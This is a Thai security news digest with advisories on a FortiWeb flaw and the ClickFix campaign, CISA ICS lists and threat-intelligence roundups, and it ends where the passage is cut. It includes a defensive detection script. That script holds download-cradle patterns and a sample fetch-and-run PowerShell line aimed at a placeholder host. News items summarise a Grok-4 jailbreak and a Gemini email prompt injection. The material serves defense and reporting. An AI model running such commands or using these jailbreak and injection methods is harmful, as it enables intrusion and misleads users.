News updates are available on the webboard or the NCSA Thailand Facebook page.
Critical vulnerability in FortiWeb
On 10 July 2025 (B.E. 2568), the Cyber Security Agency of Singapore (CSA) reported that Fortinet has released security updates to fix a critical vulnerability, CVE-2025-25257, affecting its FortiWeb product.
Impact
Successful exploitation of this Structured Query Language (SQL) injection vulnerability may allow an unauthenticated attacker to execute unauthorized code or SQL commands via specially crafted HTTP or HTTPS requests.
Affected products
This vulnerability affects the following products:
- FortiWeb versions 7.6.0 through 7.6.3
- FortiWeb versions 7.4.0 through 7.4.7
- FortiWeb versions 7.2.0 through 7.2.10
- FortiWeb versions 7.0.0 through 7.0.10
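As an added illustration (not part of the CSA advisory or of any Fortinet tooling), the check below encodes the four affected FortiWeb version ranges listed above and triages a constructed inventory of hostnames and version strings. The hostnames, the version-string format and the verdict labels are assumptions; the ranges themselves are the ones the advisory states.

```python
"""Added example: triage FortiWeb version strings against the CVE-2025-25257
affected ranges from the CSA advisory. Not part of the advisory or Fortinet tooling."""
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# Affected ranges exactly as listed in the advisory, inclusive at both ends.
AFFECTED_RANGES = [
    ((7, 6, 0), (7, 6, 3)),
    ((7, 4, 0), (7, 4, 7)),
    ((7, 2, 0), (7, 2, 10)),
    ((7, 0, 0), (7, 0, 10)),
]


def parse_version(text: str) -> Optional[Version]:
    """Turn 'major.minor.patch' into a comparable tuple.

    Accepts a leading 'v' and ignores anything after a comma or space (a
    build tag, for instance). Returns None for anything that is not a
    three-part numeric version, so callers never silently compare garbage.
    """
    core = text.strip().lstrip("vV").split(",")[0].split(" ")[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        return None
    return (int(parts[0]), int(parts[1]), int(parts[2]))


def is_affected(version: str) -> Optional[bool]:
    """True if the version falls inside a listed range, False if it does not,
    None if the string could not be parsed. A False only means "not in the
    listed ranges": branches the advisory does not mention should be checked
    against the vendor PSIRT entry (FG-IR-25-151) rather than assumed safe."""
    parsed = parse_version(version)
    if parsed is None:
        return None
    return any(low <= parsed <= high for low, high in AFFECTED_RANGES)


def triage_inventory(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> verdict. 'patch' hosts need the upgrade (or the HTTP/HTTPS
    management interface disabled until they get it); 'unknown' hosts need a
    manual look because the recorded version string is unusable."""
    verdicts = {}
    for host, version in inventory.items():
        affected = is_affected(version)
        if affected is None:
            verdicts[host] = "unknown"
        elif affected:
            verdicts[host] = "patch"
        else:
            verdicts[host] = "not-affected"
    return verdicts


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "waf-dmz-01": "7.6.3",
    "waf-dmz-02": "7.6.4",
    "waf-lab-01": "v7.0.10",
    "waf-lab-02": "7.2.11",
    "waf-old-01": "n/a",
}

if __name__ == "__main__":
    for host, verdict in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {verdict}")
```

The parser deliberately refuses anything that is not a three-part numeric version rather than guessing, so a host whose asset record holds junk ends up in the "unknown" bucket for a manual check instead of being reported as safe.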
Remediation
Users and administrators of affected versions should upgrade to the latest version immediately. If patching cannot be done right away or is not feasible, administrators should disable the HTTP/HTTPS management interface as a temporary workaround.
References
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-069
ClickFix campaign used in social engineering attacks
On 10 July 2025 (B.E. 2568), the Cyber Security Agency of Singapore (CSA) reported that threat actors are using a social engineering technique called ClickFix to trick potential victims into running malicious commands.
According to the report, threat actors use ClickFix to trick potential victims into running malicious commands under the guise of a "quick fix" for common computer problems. The technique targets organizations across many sectors, including technology, finance, manufacturing, wholesale and retail, government, professional and legal services, utilities, and energy.
What is ClickFix?
ClickFix is a relatively new social engineering technique that threat actors are using more and more. Targeted users are tricked into performing a "quick fix" for computer problems such as performance issues, missing drivers, or pop-up errors. Since it was first reported in 2024 (B.E. 2567), ClickFix has led to malware being spread through compromised websites, malicious distribution infrastructure, and phishing emails.
Tactics, Techniques and Procedures (TTPs)
ClickFix relies on clipboard hijacking, in which malicious software covertly intercepts and modifies the content a user copies and pastes on the device. It typically uses a dialog box with a fake error message to trick the user into copying a malicious script or command into the clipboard via a ClickFix inject, and then instructs the user to paste and run the malicious content. In recent months, threat actors have also used fake verification pages that ask the user to perform certain actions before redirecting to the intended page. Sample pop-up messages from ClickFix campaigns are shown in Appendix A. Victims typically go through three steps that cause a malicious PowerShell command to execute:
- Open the Windows Run dialog
- Paste the malicious PowerShell command into the terminal, automatically or manually [press 'CTRL+V']
- Run the command [press 'Enter']
Impact
Successful execution of the ClickFix technique can lead to the installation of various kinds of malware, such as NetSupport RAT, Latrodectus and Lumma Stealer, which may result in credential theft, data leakage, email account compromise, and ransomware incidents. Threat actors can use their access to compromised systems to escalate privileges and move laterally to other systems within the network.
Protective measures
Organizations should take the following measures to protect against ClickFix campaigns:
- Be more alert to fake "CAPTCHA" or "Fix It" pop-ups, and recognize warning signs such as unexpected instructions to use the Run dialog
- Keep systems, applications and software updated to the latest versions, and use up-to-date antivirus software to detect malware and malicious phishing links
- Use a SIEM solution for logging, asset visibility and continuous monitoring, in order to detect abnormal network connections and malicious PowerShell commands
- Enforce strict access control policies so that users and systems have only the minimum privileges they need, limiting the impact of a compromise and preventing privilege escalation and lateral movement
- Use application control (application whitelisting) so that only authorized software and scripts can run, preventing execution of unknown executables and malicious PowerShell scripts
- Administrators should consider monitoring and blocking the indicators of compromise (IOCs) associated with ClickFix campaigns, as shown in the table below
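The three-step procedure in the TTPs section and the SIEM recommendation in the list above suggest a simple process-creation detection: a PowerShell process whose parent is the Windows shell (a Run-dialog launch is spawned by explorer.exe) combined with command-line traits that are common in pasted one-liners. The following is an added example, not code from the CSA advisory; the log records are constructed, the field names are assumed to be what a SIEM normalizes from Windows 4688 or Sysmon Event ID 1 events, and the pattern list is this example's own heuristic, not the advisory's IOC table.

```python
"""Added example: flag process-creation records that match the ClickFix pattern
described above. Not from the CSA advisory; field names, parent-process logic
and the indicator patterns are this example's own assumptions."""
import re
from typing import Dict, List

# A Run-dialog launch (Win+R) is spawned by the Windows shell, so the parent
# image of the pasted command is explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits common in pasted one-liners. Each is legitimate in admin
# scripting on its own; the combination with an explorer.exe parent is what
# makes the event worth a look.
SUSPICIOUS_PATTERNS = [
    ("encoded command", re.compile(r"(?i)\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden window", re.compile(r"(?i)\s-w(indowstyle)?\s+hidden")),
    ("execution policy bypass", re.compile(r"(?i)\s-e(xecutionpolicy|p)\s+bypass")),
    ("web download cradle", re.compile(
        r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b")),
    ("inline invoke-expression", re.compile(r"(?i)\b(iex|invoke-expression)\b")),
]

# Constructed records shaped like what a SIEM normalizes from Windows 4688 or
# Sysmon Event ID 1; none of this is real telemetry, and the encoded token is a
# placeholder string, not a decodable payload.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"user": "CORP\\alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -ep bypass -enc UABsAGEAYwBlAGgAbwBsAGQA"},
    {"user": "CORP\\bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": 'pwsh "iwr http://example.invalid/fix | iex"'},
    {"user": "CORP\\svc_build", "parent_image": r"C:\Program Files\Jenkins\jenkins.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -File C:\\build\\deploy.ps1"},
    {"user": "CORP\\carol", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: Dict[str, str]) -> Dict[str, object]:
    """Return the user, a verdict and the reasons behind it.

    'clickfix-candidate' needs both signals: PowerShell started from the shell
    and at least one suspicious command-line trait. Either signal alone is
    'review' so that noisy-but-legitimate admin activity is not paged on.
    """
    reasons = [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(event["command_line"])]
    shell_from_explorer = (image_name(event["image"]) in POWERSHELL_IMAGES
                           and image_name(event["parent_image"]) in INTERACTIVE_PARENTS)
    if shell_from_explorer and reasons:
        verdict = "clickfix-candidate"
    elif shell_from_explorer or reasons:
        verdict = "review"
    else:
        verdict = "benign"
    return {"user": event["user"], "verdict": verdict, "reasons": reasons}


def find_candidates(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Only the records that meet the full ClickFix pattern."""
    return [r for r in map(analyze_event, events) if r["verdict"] == "clickfix-candidate"]


if __name__ == "__main__":
    for hit in find_candidates(SAMPLE_EVENTS):
        print(f"{hit['user']}: {', '.join(hit['reasons'])}")
```

The parent-process condition is what ties the rule to the paste-and-run step rather than to PowerShell in general; hosts where script-block logging (Event ID 4104) is enabled can feed the same pattern list with the decoded script text, which catches the encoded case more reliably than the command line alone.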
References
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-068
CISA issues 13 Industrial Control Systems advisories
The Cybersecurity and Infrastructure Security Agency (CISA) released 13 Industrial Control Systems (ICS) advisories on 10 July 2025 (B.E. 2568). These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. They are as follows:
- ICSA-25-191-01 Siemens SINEC NMS
- ICSA-25-191-02 Siemens Solid Edge
- ICSA-25-191-03 Siemens TIA Administrator
- ICSA-25-191-04 Siemens SIMATIC CN 4100
- ICSA-25-191-05 Siemens TIA Project-Server and TIA Portal
- ICSA-25-191-06 Siemens SIPROTEC 5
- ICSA-25-191-07 Delta Electronics DTM Soft
- ICSA-25-191-08 Advantech iView
- ICSA-25-191-09 KUNBUS RevPi Webstatus
- ICSA-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol
- ICSA-25-121-01 KUNBUS GmbH Revolution Pi (Update A)
- ICSA-25-135-19 ECOVACS DEEBOT Vacuum and Base Station (Update A)
- ICSA-24-263-02 IDEC Products (Update A)
CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations. Further details are available at https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-releases-thirteen-industrial-control-systems-advisories
References
https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-releases-thirteen-industrial-control-systems-advisories
CISA issues 1 Industrial Control Systems advisory
The Cybersecurity and Infrastructure Security Agency (CISA) released 1 Industrial Control Systems (ICS) advisory on 8 July 2025 (B.E. 2568). The advisory provides timely information about current security issues, vulnerabilities, and exploits surrounding ICS. It is as follows:
- ICSA-25-189-01 Emerson ValveLink Products
CISA encourages users and administrators to review the newly released ICS advisory for technical details and mitigations. Further details are available at https://www.cisa.gov/news-events/alerts/2025/07/08/cisa-releases-one-industrial-control-systems-advisory
Cyber Threat Intelligence 14 July 2025
Financial Sector
- Financial Firms Are Locking The Front Door But Leaving The Back Open
"Financial institutions are building stronger defenses against direct cyberattacks, but they may be overlooking a growing problem: their vendors. According to Black Kite’s new report, third-party risk has become one of the biggest cybersecurity threats facing the financial sector."
https://www.helpnetsecurity.com/2025/07/11/financial-firms-third-party-cyber-risk/
- Factoring Cybersecurity Into Finance's Digital Strategy
"The financial industry is witnessing a significant shift, fueled by artificial intelligence (AI) advancements to meet consumer demand for digital and personalized services. A recent Gartner report highlighted that the adoption of AI in financial functions surged by 21% in 2024 alone. With technological leaps transforming operations comes equal technological advancement for bad actors to breach financial institution infrastructures. As a result, financial institutions must undertake a critical responsibility to stay ahead of threats to safeguard their assets as well as customers' data and privacy. This requires implementing a combination of reactive defense mechanisms and designing proactive systems capable of anticipating and preventing emerging threats."
https://www.darkreading.com/cyberattacks-data-breaches/factoring-cybersecurity-finances-digital-strategy
Vulnerabilities
- Pre-Auth SQL Injection To RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257)
"Welcome back to yet another day in this parallel universe of security. This time, we’re looking at Fortinet’s FortiWeb Fabric Connector. “What is that?” we hear you say. That's a great question; no one knows. For the uninitiated, or unjaded; Fortinet’s FortiWeb Fabric Connector is meant to be the glue between FortiWeb (their web application firewall) and other Fortinet ecosystem products, allowing for dynamic, policy-based security updates based on real-time changes in infrastructure or threat posture. Think of it as a fancy middleman - pulling metadata from sources like FortiGate firewalls, FortiManager, or even external services like AWS, and feeding that into FortiWeb so it can automatically adjust its protections. In theory, it should make things smarter and more responsive."
https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/
https://fortiguard.fortinet.com/psirt/FG-IR-25-151
https://www.bleepingcomputer.com/news/security/exploits-for-pre-auth-fortinet-fortiweb-rce-flaw-released-patch-now/
https://thehackernews.com/2025/07/fortinet-releases-patch-for-critical.html
https://hackread.com/critical-vulnerability-fortinet-fortiweb-cve-2025-25257/
https://securityaffairs.com/179874/security/patch-immediately-cve-2025-25257-poc-enables-remote-code-execution-on-fortinet-fortiweb.html
- Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited In The Wild
"Huntress saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) on a customer on July 1, 2025. Organizations running Wing FTP Server should update to the fixed version, version 7.4.4, as soon as possible. CVE-2025-47812 is a null byte and Lua injection flaw that can lead to root/SYSTEM-level remote code execution if exploited. The vulnerability was first publicly disclosed on June 30 by Julien Ahrens in versions prior to 7.4.4 of the Wing FTP Server, its file transfer protocol software for Windows, Linux, and macOS. At a high level, CVE-2025-47812 stems from how null bytes are handled in the username parameter (specifically related to the loginok.html file, which handles the authentication process). This can allow remote attackers to perform Lua injection after using the null byte in the username parameter."
https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html
https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/
https://www.securityweek.com/critical-wing-ftp-server-vulnerability-exploited/
https://www.theregister.com/2025/07/11/1010_wing_ftp_bug_exploited/
https://www.helpnetsecurity.com/2025/07/11/critical-wing-ftp-server-vulnerability-exploited-in-the-wild-cve-2025-47812/
https://securityaffairs.com/179861/hacking/wing-ftp-server-flaw-actively-exploited-shortly-after-technical-details-were-made-public.html
- NVIDIA Shares Guidance To Defend GDDR6 GPUs Against Rowhammer Attacks
"NVIDIA is warning users to activate System Level Error-Correcting Code mitigation to protect against Rowhammer attacks on graphical processors with GDDR6 memory. The company is reinforcing the recommendation as new research demonstrates a Rowhammer attack against an NVIDIA A6000 GPU (graphical processing unit). Rowhammer is a hardware fault that can be triggered through software processes and stems from memory cells being too close to each other. The attack was demonstrated on DRAM cells but it can affect GPU memory, too."
https://www.bleepingcomputer.com/news/security/nvidia-shares-guidance-to-defend-gddr6-gpus-against-rowhammer-attacks/
https://nvidia.custhelp.com/app/answers/detail/a_id/5671
https://thehackernews.com/2025/07/gpuhammer-new-rowhammer-attack-variant.html
https://www.securityweek.com/rowhammer-attack-demonstrated-against-nvidia-gpu/
- Grok-4 Falls To a Jailbreak Two Days After Its Release
"The latest release of the xAI LLM, Grok-4, has already fallen to a sophisticated jailbreak. The Echo Chamber jailbreak attack was described on June 23, 2025. xAI’s latest Grok-4 was released on July 9, 2025. Two days later it fell to a combined Echo Chamber and Crescendo jailbreak attack. Echo Chamber was developed by NeuralTrust. We describe it in New AI Jailbreak Bypasses Guardrails With Ease. It uses subtle context poisoning to nudge an LLM into providing dangerous output. The methodology is shown below."
https://www.securityweek.com/grok-4-falls-to-a-jailbreak-two-days-after-its-release/
- Google Gemini Flaw Hijacks Email Summaries For Phishing
"Google Gemini for Workspace can be exploited to generate email summaries that appear legitimate but include malicious instructions or warnings that direct users to phishing sites without using attachments or direct links. Such an attack leverages indirect prompt injections that are hidden inside an email and obeyed by Gemini when generating the message summary. Despite similar prompt attacks being reported since 2024 and safeguards being implemented to block misleading responses, the technique remains successful."
https://www.bleepingcomputer.com/news/security/google-gemini-flaw-hijacks-email-summaries-for-phishing/
Malware
- Malware Found In Official GravityForms Plugin Indicating Supply Chain Breach
"The Patchstack team has been monitoring targeted supply chain attacks involving a vendor of a plugin or theme. At first, we noticed that Groundhogg was affected by this supply chain attack, and its plugins were compromised by malware that was injected. The full details can be viewed here. Today, we received information about a possible targeted supply chain attack against Gravity Forms. We are still actively investigating to better understand the scale and impact, but as we have proof of infected websites and IOCs to keep an eye on, we're sharing this information in this post so people could check if they have been affected."
https://patchstack.com/articles/critical-malware-found-in-gravityforms-official-plugin-site/
https://www.bleepingcomputer.com/news/security/wordpress-gravity-forms-developer-hacked-to-push-backdoored-plugins/
- BlackSuit: A Hybrid Approach With Data Exfiltration And Encryption
"Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them. In this Threat Analysis report, Cybereason Security Services investigates a BlackSuit ransomware attack we recently observed that represents a significant threat to organizations, leveraging tools like Cobalt Strike for command and control (C2), rclone for data exfiltration, and BlackSuit ransomware for file encryption."
https://www.cybereason.com/blog/blacksuit-data-exfil
- Evolving Tactics Of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques
"In late 2024, we discovered a malware variant related to the SLOW#TEMPEST campaign. In this research article, we explore the obfuscation techniques employed by the malware authors. We deep dive into these malware samples and highlight methods and code that can be used to detect and defeat the obfuscation techniques. Understanding these evolving tactics is essential for security practitioners to develop robust detection rules and strengthen defenses against increasingly sophisticated threats."
https://unit42.paloaltonetworks.com/slow-tempest-malware-obfuscation/
- SafePay Ransomware: The Fast-Rising Threat Targeting MSPs
"In Q1 2025, one ransomware group surged rapidly from obscurity to become one of the most active and dangerous actors on the global threat landscape: SafePay. It has quietly and aggressively built momentum, striking over 200 victims worldwide, including managed service providers (MSPs) and small-to-midsize businesses (SMBs) across industries. Acronis Threat Research Unit (TRU) analyzed several SafePay samples and confirmed the group’s use of recycled — but highly efficient — tactics, including disabling endpoint protection, deleting shadow copies and clearing logs to suppress detection and response. Unlike many ransomware groups that rely on affiliates in a ransomware-as-a-service (RaaS) model, SafePay appears to operate with centralized control, managing its own operations, infrastructure and negotiations."
https://www.acronis.com/en-us/tru/posts/safepay-ransomware-the-fast-rising-threat-targeting-msps/
- Wipe, Leak, Extort: The Crazy Hybrid Playbook Of Anubis Ransomware
"Anubis is a ransomware-as-a-service (RaaS) operation that emerged in December 2024, and quickly distinguished itself by integrating file-wiping capabilities alongside the traditional encryption and data exfiltration. The group operates multiple affiliate programs with revenue splits ranging from 50% to 80%, and targets multiple sectors in several countries, including Australia, Canada, Peru and the United States."
https://blog.barracuda.com/2025/07/11/wipe--leak--extort--the-crazy-hybrid-playbook-of-anubis-ransomwa
Breaches/Hacks/Leaks
- Albemarle Latest Virginia County Hit With Ransomware
"Phone and technology outages that plagued Albemarle County last month were caused by a ransomware attack, officials said in a statement on Friday. The county warned residents that it “appears likely” the hackers accessed the data of local government and public school employees — including their driver’s license numbers, Social Security numbers, passport numbers, military IDs and more. Some of the 112,000 residents of the county, home to the city of Charlottesville, also may have had their names, addresses and Social Security numbers exposed. The county said it is still conducting its investigation into the ransomware attack, which was initially discovered on the morning of June 11."
https://therecord.media/albemarle-virginia-ransomware-attack
- Hacker Returns Cryptocurrency Stolen From GMX Exchange After $5 Million Bounty Payment
"The person behind a $42 million theft from decentralized exchange GMX has returned the stolen cryptocurrency in exchange for a $5 million bounty. After the theft came to light on Wednesday, GMX promised the hacker not to pursue litigation if the funds were returned. “You've successfully executed the exploit; your abilities in doing so are evident to anyone looking into the exploit transactions,” the company said in a subsequent note on Thursday."
https://therecord.media/hacker-returns-stolen-gmx-bounty
- Exploiting Public APP_KEY Leaks To Achieve RCE In Hundreds Of Laravel Applications
"Laravel APP_KEY leaks enable RCE via deserialization attacks. Collaboration with Synacktiv scaled findings to 600 vulnerable applications using 260K exposed keys from GitHub. Analysis reveals 35% of exposures coincide with other critical secrets including database, cloud tokens, and API credentials."
https://blog.gitguardian.com/exploiting-public-app_key-leaks/
https://thehackernews.com/2025/07/over-600-laravel-apps-exposed-to-remote.html
General News
- Hacktivist Attacks On Critical Infrastructure Grow As New Groups Emerge
"Hacktivists are increasingly targeting critical infrastructure as they expand beyond the DDoS attacks and website defacements typically associated with ideologically motivated cyberattacks. Cyble’s assessment of the hacktivism threat landscape in the second quarter of 2025 found that industrial control system (ICS) attacks, data breaches, and access-based attacks now comprise 31% of hacktivist attacks, up from 29% in the first quarter (chart below)."
https://cyble.com/blog/hacktivists-attacks-on-critical-infrastructure/
- Where Policy Meets Profit: Navigating The New Frontier Of Defense Tech Startups
"In this Help Net Security interview, Thijs Povel, Managing Partner at Ventures.eu, discusses how the firm evaluates emerging technologies through the lens of defense and resilience. He explains how founders from both defense and adjacent sectors are addressing policy shifts, procurement cycles, and dual-use innovation. Povel also offers guidance for founders on handling slow-moving procurement cycles and proving the business case for resilience solutions."
https://www.helpnetsecurity.com/2025/07/11/thijs-povel-ventures-eu-dual-use-tech/
- Employees Are Quietly Bringing AI To Work And Leaving Security Behind
"While IT departments race to implement AI governance frameworks, many employees have already opened a backdoor for AI, according to ManageEngine. Shadow AI has quietly infiltrated organizations across North America, creating blind spots that even the most careful IT leaders struggle to detect. Despite formal guidelines and sanctioned tools, shadow AI has become the norm rather than the exception. 70% of IT decision makers (ITDMs) have identified unauthorized AI use within their organizations."
https://www.helpnetsecurity.com/2025/07/11/organizations-shadow-ai-risk/
- Romania And UK Arrest 14 In British Tax Repayment Scam Probe
"Police on Thursday arrested 13 individuals in Romania and one in England on suspicion of engaging in a massive tax fraud scheme against Great Britain. The arrests appear to be tied to an operation probing a gang that used phishing attacks against British taxpayers to steal 47 million pounds - $63 million - from His Majesty's Revenue and Customs, the U.K. government agency responsible for collecting taxes. Parliament's Treasury Committee, which oversees the tax collector, slammed HMRC top brass for failing to notify lawmakers about the 2024 losses, which only came to light in June when 100,000 taxpayers received notification that their online accounts had been breached."
https://www.bankinfosecurity.com/romania-uk-arrest-14-in-british-tax-repayment-scam-probe-a-28943
https://hackread.com/14-arrested-romania-47-million-uk-tax-phishing-scam/
- As Cyber-Insurance Premiums Drop, Coverage Is Key To Resilience
"The cyber-insurance market continues to generate profits for underwriters, but competition in the market and softening demand has led to a decline in the total revenue from premiums for the third straight year in a row — a situation that could work in businesses' favor. Overall, cyber-insurance experts expect premiums to continue to decline in 2025 and likely level off next year, as market economics balance supply and demand. Renewal rates for cyber-insurance policies have declined each quarter for the last three quarters, which is expected to continue, according to credit and economic firm Fitch Ratings."
https://www.darkreading.com/vulnerabilities-threats/cyber-insurance-premiums-drop-coverage-key-resilience
- Google Trackers: What You Can Actually Escape And What You Can’t
"Google is everywhere — in your emails, documents, maps, phone, in your working hours, and even in your leisure time. It’s become a part of our daily lives, and getting out of its ecosystem can feel impossible. But can switching to more privacy-focused options really help an ordinary user break free? Even if you stop using Google products directly, your data might still pass through its servers without your knowledge. Many websites use tools like Google Analytics, embed YouTube videos, run Google ads, or rely on Google Cloud. One common example is reCAPTCHA — countless websites use this tool to verify you’re a human user, and (you guessed it) it belongs to Google, too."
https://www.safetydetectives.com/blog/google-dependency-and-user-data-tracking/
https://hackread.com/new-study-google-tracking-persists-privacy-tools/
- Behind The Code: How Developers Work In 2025
"How are developers working in 2025? Docker surveyed over 4,500 people to find out, and the answers are a mix of progress and ongoing pain points. AI is gaining ground but still unevenly used. Security is now baked into everyday workflows. Most devs have left local setups behind in favor of cloud environments. And while tools are improving, coordination, planning, and time estimation still slow teams down."
https://www.helpnetsecurity.com/2025/07/11/docker-2025-developer-trends/
- July 2025 Breaks a Decade Of Monthly Android Patches
"Google this week announced that no security patches have been released for Android, Pixel devices, and other Android-based platforms this month, ending a decade-long streak of security updates. As customary in the first week of each month, security bulletins were published for the core Android operating system, as well as for Pixel devices, Android Automotive OS (AAOS), Wear OS, and Pixel Watch, but they all contain the same message: there are no security patches in the July 2025 bulletin. This is the first month without security updates since Google started rolling out monthly Android fixes in August 2015, looking to make the mobile operating system safer for both users and vendors."
https://www.securityweek.com/july-2025-breaks-a-decade-of-monthly-android-patches/
- You Have a Fake North Korean IT Worker Problem - Here's How To Stop It
"By now, the North Korean fake IT worker problem is so ubiquitous that if you think you don't have any phony resumes or imposters in your interview queue, you're asleep at the wheel. "Almost every CISO of a Fortune 500 company that I've spoken to — I'll just characterize as dozens that I've spoken to — have admitted that they had a North Korean IT worker problem," said Mandiant Consulting CTO Charles Carmakal during a threat-intel roundtable, admitting that even Mandiant's parent company Google is not immune. "We have seen this in our own pipelines," added Iain Mulholland, Google Cloud's senior director of security engineering."
https://www.theregister.com/2025/07/13/fake_it_worker_problem/
References
Electronic Transactions Development Agency (ETDA)
Cyber Threat Intelligence 11 July 2025
Industrial Sector
- CISA Releases Thirteen Industrial Control Systems Advisories
"CISA released thirteen Industrial Control Systems (ICS) advisories on July 10, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
ICSA-25-191-01 Siemens SINEC NMS
ICSA-25-191-02 Siemens Solid Edge
ICSA-25-191-03 Siemens TIA Administrator
ICSA-25-191-04 Siemens SIMATIC CN 4100
ICSA-25-191-05 Siemens TIA Project-Server and TIA Portal
ICSA-25-191-06 Siemens SIPROTEC 5
ICSA-25-191-07 Delta Electronics DTM Soft
ICSA-25-191-08 Advantech iView
ICSA-25-191-09 KUNBUS RevPi Webstatus
ICSA-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol"
https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-releases-thirteen-industrial-control-systems-advisories
Vulnerabilities
- How Tenable Research Discovered a Critical Remote Code Execution Vulnerability On Anthropic MCP Inspector
"Tenable Research recently discovered a critical vulnerability impacting Anthropic's MCP Inspector tool, a core element of the MCP ecosystem. In this blog, we provide details on how we discovered the vulnerability in this widely used open-source tool — and what users can do about it. Tenable Research discovered a critical vulnerability (CVE-2025-49596) in Anthropic's MCP Inspector. This open-source tool, widely used for testing and troubleshooting Model Context Protocol (MCP) servers, is highly popular with over 38,000 weekly downloads on npmjs and more than 4,000 stars on GitHub. Further details are available in the advisory."
https://www.tenable.com/blog/how-tenable-research-discovered-a-critical-remote-code-execution-vulnerability-on-anthropic
https://www.darkreading.com/application-security/agentic-ai-risky-mcp-backbone-attack-vectors
- CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-5777 Citrix NetScaler ADC and Gateway Out-of-Bounds Read Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-adds-one-known-exploited-vulnerability-catalog
https://www.theregister.com/2025/07/10/cisa_citrixbleed_kev/
- PerfektBlue Bluetooth Flaws Impact Mercedes, Volkswagen, Skoda Cars
"Four vulnerabilities dubbed PerfektBlue and affecting the BlueSDK Bluetooth stack from OpenSynergy can be exploited to achieve remote code execution and potentially allow access to critical elements in vehicles from multiple vendors, including Mercedes-Benz AG, Volkswagen, and Skoda. OpenSynergy confirmed the flaws last year in June and released patches to customers in September 2024 but many automakers have yet to push the corrective firmware updates. At least one major OEM learned only recently about the security risks. The security issues can be chained together into an exploit that researchers call a PerfektBlue attack and can be delivered over-the-air by an attacker, requiring "at most 1-click from a user.""
https://www.bleepingcomputer.com/news/security/perfektblue-bluetooth-flaws-impact-mercedes-volkswagen-skoda-cars/
https://pcacybersecurity.com/resources/advisory/perfekt-blue
https://www.securityweek.com/millions-of-cars-exposed-to-remote-hacking-via-perfektblue-attack/
https://securityaffairs.com/179789/hacking/perfektblue-bluetooth-attack-allows-hacking-infotainment-systems-of-mercedes-volkswagen-and-skoda.html
- Asus And Adobe Vulnerabilities
"Cisco Talos’ Vulnerability Discovery & Research team recently disclosed two vulnerabilities each in Asus Armoury Crate and Adobe Acrobat products. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website."
https://blog.talosintelligence.com/asus-and-adobe-vulnerabilities/
- eSIM Bug In Millions Of Phones Enables Spying, Takeover
"Systemic vulnerabilities in embedded Subscriber Identity Module (eSIM) cards have exposed billions of devices to spying, SIM swaps, and other threats. Billions of phone users around the world have moved on from traditional SIM cards to eSIMs. They allow multiple phone carrier subscriptions to exist on a single device. Unlike traditional SIM cards, you can't physically remove and replace them, and they tout superior security."
https://www.darkreading.com/endpoint-security/esim-bug-millions-phones-spying-takeover
https://www.securityweek.com/esim-hack-allows-for-cloning-spying/
- Fix The Click: Preventing The ClickFix Attack Vector
"In this article, we share hunting tips and mitigation strategies for ClickFix campaigns and provide an inside view of some of the most prominent ClickFix campaigns we have seen so far in 2025:
- Attackers distributing NetSupport remote access Trojan (RAT) are ramping up activities with a new loader
- Attackers distributing Latrodectus malware are luring victims with a new ClickFix campaign
- Prolific Lumma Stealer campaign targeting multiple industries with new techniques"
https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
Malware
- Code Highlighting With Cursor AI For $500,000
